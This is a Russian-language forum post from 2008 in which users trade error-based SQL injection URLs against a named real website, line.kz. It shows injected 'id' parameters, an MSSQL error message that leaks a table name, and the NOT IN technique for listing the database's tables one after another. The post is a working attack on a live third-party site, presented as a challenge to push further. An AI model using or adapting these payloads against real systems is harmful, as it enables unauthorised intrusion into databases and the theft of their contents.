31.12.2008, 14:53
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Сообщение от Gemini12
Код:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+id+FROM+vacancy)--
Кто дальше сможет? )) Дальше смотришь все таблицы в information_schema.
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+in formation_schema.tables)--
Microsoft OLE DB Provider for SQL Server ошибка '80040e07'
Syntax error converting the nvarchar value 'tbl_comps' to a column of data type int.
/reviews/default.asp, line 40
Чтобы дальше смотреть используем NOT+IN
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+table_name+from+in formation_schema.tables+where+table_name+NOT+IN('t bl_comps'))--
Ну и так дальше.
|
|
|